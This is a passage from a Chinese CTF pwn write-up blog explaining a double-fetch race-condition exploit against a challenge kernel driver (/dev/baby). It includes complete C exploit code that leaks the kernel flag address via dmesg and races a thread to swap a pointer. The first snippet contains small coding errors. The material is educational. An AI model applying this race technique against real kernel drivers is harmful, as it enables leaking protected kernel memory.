<p>接下来是我的理解：虽然线程1只能够通过前面的check（地址check），线程2只能够通过后面的check（flag check），但是问题就在于两个线程之间存在碰撞，只要两个线程不断地运行，那么总有一个时间点是<strong>线程1通过了前面的check，在准备进行后面的check的时候，线程2把那个要用到的指针给改了</strong>，此时内核再回来取用户态的flag指针，实际上拿到的是被修改之后的指针，相当于内核空间中的flag跟自己比较，那么当然就能够通过比较从而输出flag了</p>
<p>那么现在的问题就是具体应该怎么做呢？</p>
<ol>
<li><p>首先肯定先要拿到内核空间中flag的地址，这部分很简单</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> fd = open(<span class="string">&quot;/dev/baby&quot;</span>,<span class="number">0</span>);</span><br><span class="line">ioctl(fd,<span class="number">0x6666</span>);</span><br><span class="line">system(<span class="string">&quot;dmesg | grep flag &gt; /tmp/tmp.txt&quot;</span>);</span><br><span class="line"><span class="keyword">int</span> fp = open(<span class="string">&quot;/tmp/tmp.txt&quot;</span>);</span><br><span class="line"><span class="keyword">char</span> buf[<span class="number">0x1001</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"><span class="keyword">char</span> *flag_addr = <span class="literal">NULL</span>;</span><br><span class="line"><span class="keyword">if</span> (!read(fp,buf,<span class="number">0x1000</span>))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;read ERR&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line">flag_addr = <span class="built_in">strstr</span>(<span class="string">&quot;Your flag is at &quot;</span>);</span><br><span class="line"><span class="keyword">if</span> (!flag_addr)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;ERR&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">    flag_addr += <span class="number">16</span>;</span><br><span class="line">    addr = strtoull(flag_addr,<span class="literal">NULL</span>,<span class="number">16</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+]flag_addr = %p&quot;</span>,addr);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在内核中输出flag地址之后用dmesg将输出重定向到一个文件里（方便查找），然后再从该文件里找到flag地址，用<code>strtoull()</code>函数将字符串转成16进制</p>
</li>
<li><p>拿到内核中的flag地址之后就可以利用条件竞争了，新开一个线程，不断将传入的flag指针改成内核flag地址，同时程序本身的线程不断将正常的flag地址传进去，这部分还是意会更简单一点。</p>
</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;pthread.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">suct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">	<span class="keyword">char</span> *flag;</span><br><span class="line">	<span class="keyword">int</span> len;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> finish = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">char</span> *flag_addr = <span class="literal">NULL</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> addr = <span class="number">0</span>;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">change_flag</span><span class="params">(struct suct *s)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">while</span>(finish == <span class="number">0</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		s-&gt;flag = addr;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">pthread_t</span> thread2;</span><br><span class="line">	setvbuf(<span class="built_in">stdout</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>);</span><br><span class="line">	setvbuf(<span class="built_in">stdin</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>);</span><br><span class="line">	setvbuf(<span class="built_in">stderr</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>);</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">int</span> fd = open(<span class="string">&quot;/dev/baby&quot;</span>,<span class="number">0</span>);</span><br><span class="line">	<span class="comment">//find kernel flag_addr</span></span><br><span class="line">	ioctl(fd,<span class="number">0x6666</span>);</span><br><span class="line">	system(<span class="string">&quot;dmesg | grep flag &gt; /tmp/tmp.txt&quot;</span>);</span><br><span class="line">	<span class="keyword">int</span> fp = open(<span class="string">&quot;/tmp/tmp.txt&quot;</span>,<span class="number">0</span>);</span><br><span class="line">	<span class="keyword">char</span> buf[<span class="number">0x1001</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">	<span class="keyword">if</span> (!read(fp,buf,<span class="number">0x1000</span>))</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;ERROR&quot;</span>);</span><br><span class="line">		<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	flag_addr = <span class="built_in">strstr</span>(buf,<span class="string">&quot;Your flag is at &quot;</span>);</span><br><span class="line">	<span class="keyword">if</span> (!flag_addr)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;ERROR&quot;</span>);</span><br><span class="line">		<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		flag_addr += <span class="number">16</span>;</span><br><span class="line">		addr = strtoull(flag_addr,<span class="literal">NULL</span>,<span class="number">16</span>);</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;[+]flag_addr: %p\n&quot;</span>,addr);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">//double fetch</span></span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">suct</span> <span class="title">sct</span>;</span></span><br><span class="line">	sct.flag = buf;</span><br><span class="line">	sct.len = <span class="number">33</span>;</span><br><span class="line">	pthread_create(&amp;thread2,<span class="literal">NULL</span>,change_flag,&amp;sct);</span><br><span class="line">	<span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>;i &lt; <span class="number">0x1000</span>;i++)</span><br><span class="line">	&#123;</span><br><span class="line">		ioctl(fd,<span class="number">0x1337</span>,&amp;sct);</span><br><span class="line">		sct.flag = buf;</span><br><span class="line">	&#125;</span><br><span class="line">	finish = <span class="number">1</span>;</span><br><span class="line">	pthread_join(thread2,<span class="literal">NULL</span>);</span><br><span class="line">	close(fd);</span><br><span class="line">	close(fp);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;the result:\n&quot;</span>);</span><br><span class="line">	system(<span class="string">&quot;dmesg |grep flag&quot;</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="入门题level4"><a href="#入门题level4" class="headerlink" title="入门题level4"></a>入门题level4</h3><p>内核堆喷</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/%E2%80%98%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" rel="tag"># ‘刷题记录'</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/06/08/house-of-force/" rel="prev" title="house_of_force">
      <i class="fa fa-chevron-left"></i> house_of_force
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/06/22/exit-hook/" rel="next" title="exit_hook">
      exit_hook <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#de1ctf-2019-weapon"><span class="nav-number">1.</span> <span class="nav-text">de1ctf_2019_weapon</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%89%88%E6%9C%AC%EF%BC%9Aglibc-2-23"><span class="nav-number">1.0.1.</span> <span class="nav-text">版本：glibc-2.23</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%EF%BC%9AUAF"><span class="nav-number">1.0.2.</span> <span class="nav-text">漏洞：UAF</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%99%90%E5%88%B6%EF%BC%9Amalloc%E6%9C%80%E5%A4%A7%E5%A4%A7%E5%B0%8F%E4%B8%BA0x60%EF%BC%8C%E6%B2%A1%E6%9C%89%E6%B3%84%E6%BC%8F%E7%82%B9"><span class="nav-number">1.0.3.</span> <span class="nav-text">限制：malloc最大大小为0x60，没有泄漏点</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SWPUCTF-2019-p1KkHeap"><span class="nav-number">2.</span> <span class="nav-text">SWPUCTF_2019_p1KkHeap</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%89%88%E6%9C%AC%EF%BC%9Aglibc-2-27"><span class="nav-number">2.0.1.</span> <span class="nav-text">版本：glibc-2.27</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%EF%BC%9AUAF%EF%BC%88%E5%9B%A0%E4%B8%BA%E9%A2%98%E7%9B%AE%E7%9A%84%E9%99%90%E5%88%B6%EF%BC%8C%E8%BF%99%E4%B8%AAUAF%E4%B8%8D%E8%83%BD%E7%9B%B4%E6%8E%A5%E7%94%A8%E6%9D%A5%E7%BC%96%E8%BE%91%EF%BC%89"><span class="nav-number">2.0.2.</span> <span class="nav-text">漏洞：UAF（因为题目的限制，这个UAF不能直接用来编辑）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%99%90%E5%88%B6%EF%BC%9Amalloc%E6%9C%80%E5%A4%A7%E5%A4%A7%E5%B0%8F%E4%B8%BA0x100%EF%BC%8C%E5%85%A8%E9%83%A8%E8%8F%9C%E5%8D%95%E6%93%8D%E4%BD%9C%E5%8A%A0%E8%B5%B7%E6%9D%A5%E6%9C%80%E5%A4%9A18%E6%AC%A1%EF%BC%8C%E6%9C%80%E5%A4%9Afree-3%E6%AC%A1"><span class="nav-number">2.0.3.</span> <span class="nav-text">限制：malloc最大大小为0x100，全部菜单操作加起来最多18次，最多free 3次</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%8F%9C%E5%8D%95%E5%8A%9F%E8%83%BD%EF%BC%9Aadd%E3%80%81show%E3%80%81edit%E3%80%81delete"><span class="nav-number">2.0.4.</span> <span class="nav-text">菜单功能：add、show、edit、delete</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AF%A6%E7%BB%86%E4%B8%80%E7%82%B9"><span class="nav-number">2.1.</span> <span class="nav-text">详细一点</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#buuoj-2020-%E6%96%B0%E6%98%A5%E7%BA%A2%E5%8C%85%E9%A2%98-3"><span class="nav-number">3.</span> <span class="nav-text">buuoj [2020 新春红包题]3</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%89%88%E6%9C%AC%EF%BC%9Aglibc-2-29"><span class="nav-number">3.0.1.</span> <span class="nav-text">版本：glibc-2.29</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%EF%BC%9AUAF-1"><span class="nav-number">3.0.2.</span> <span class="nav-text">漏洞：UAF</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%80%83%E7%82%B9%EF%BC%9Atcache-stashing-unlink-attack"><span class="nav-number">3.0.3.</span> <span class="nav-text">考点：tcache stashing unlink attack</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%8F%9C%E5%8D%95%E5%8A%9F%E8%83%BD%EF%BC%9Aadd%E3%80%81show%E3%80%81edit%E3%80%81delete-1"><span class="nav-number">3.0.4.</span> <span class="nav-text">菜单功能：add、show、edit、delete</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sctf-2019-one-heap"><span class="nav-number">4.</span> <span class="nav-text">sctf_2019_one_heap</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%89%88%E6%9C%AC%EF%BC%9Aglibc-2-27-1"><span class="nav-number">4.0.1.</span> <span class="nav-text">版本：glibc-2.27</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%EF%BC%9AUAF-2"><span class="nav-number">4.0.2.</span> <span class="nav-text">漏洞：UAF</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%80%83%E7%82%B9%EF%BC%9Apartial-write%E3%80%81stdout%E6%B3%84%E6%BC%8Flibc%EF%BC%8Ctcache-struct"><span class="nav-number">4.0.3.</span> <span class="nav-text">考点：partial write、stdout泄漏libc，tcache struct</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%8F%9C%E5%8D%95%EF%BC%9Aadd%E3%80%81delete"><span class="nav-number">4.0.4.</span> <span class="nav-text">菜单：add、delete</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%99%90%E5%88%B6%EF%BC%9Amalloc%E7%9A%84%E5%80%BC%E5%B0%8F%E4%BA%8E0x7f%EF%BC%8C%E5%8F%AA%E8%83%BDdelete%E5%9B%9B%E6%AC%A1%E3%80%81add%E5%8D%81%E4%BA%94%E6%AC%A1%EF%BC%8C%E5%8F%AA%E6%9C%89%E4%B8%80%E4%B8%AA%E5%A0%86%E6%8C%87%E9%92%88"><span class="nav-number">4.0.5.</span> <span class="nav-text">限制：malloc的值小于0x7f，只能delete四次、add十五次，只有一个堆指针</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DASCTF-X-CBCTF-2022%EF%BD%9C-%E4%B9%9D%E6%9C%88%E6%8C%91%E6%88%98%E8%B5%9B%E2%80%94%E2%80%94ez-note"><span class="nav-number">5.</span> <span class="nav-text">DASCTF X CBCTF 2022｜ 九月挑战赛——ez_note</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#BlackHat-MEA-CTF-Qualification-2022"><span class="nav-number">6.</span> <span class="nav-text">BlackHat MEA CTF Qualification 2022</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%89%88%E6%9C%AC%EF%BC%9Aglibc-2-27-2"><span class="nav-number">6.0.1.</span> <span class="nav-text">版本：glibc-2.27</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%EF%BC%9AUAF-3"><span class="nav-number">6.0.2.</span> <span class="nav-text">漏洞：UAF</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%80%83%E7%82%B9%EF%BC%9Aunlink"><span class="nav-number">6.0.3.</span> <span class="nav-text">考点：unlink</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%8F%9C%E5%8D%95%EF%BC%9Aadd%E3%80%81edit%E3%80%81delete"><span class="nav-number">6.0.4.</span> <span class="nav-text">菜单：add、edit、delete</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%99%90%E5%88%B6%EF%BC%9A%E7%94%B3%E8%AF%B7%E7%9A%84%E5%A0%86%E8%A6%81%E5%A4%A7%E4%BA%8E0x100%EF%BC%8C%E6%9C%80%E5%A4%9A%E4%BA%94%E4%B8%AA%E5%A0%86%E6%8C%87%E9%92%88%EF%BC%8C%E5%8F%AA%E6%9C%89calloc"><span class="nav-number">6.0.5.</span> <span class="nav-text">限制：申请的堆要大于0x100，最多五个堆指针，只有calloc</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BF%9D%E6%8A%A4%EF%BC%9A%E6%B2%A1%E5%BC%80pie%EF%BC%8Cgot%E8%A1%A8%E5%8F%AF%E6%94%B9"><span class="nav-number">6.0.6.</span> <span class="nav-text">保护：没开pie，got表可改</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#kernel"><span class="nav-number"></span> <span class="nav-text">kernel</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%A5%E9%97%A8%E9%A2%98level1"><span class="nav-number">1.</span> <span class="nav-text">入门题level1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%A5%E9%97%A8%E9%A2%98level2"><span class="nav-number">2.</span> <span class="nav-text">入门题level2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%A5%E9%97%A8%E9%A2%98level3"><span class="nav-number">3.</span> <span class="nav-text">入门题level3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%A5%E9%97%A8%E9%A2%98level4"><span class="nav-number">4.</span> <span class="nav-text">入门题level4</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">67</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">45</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
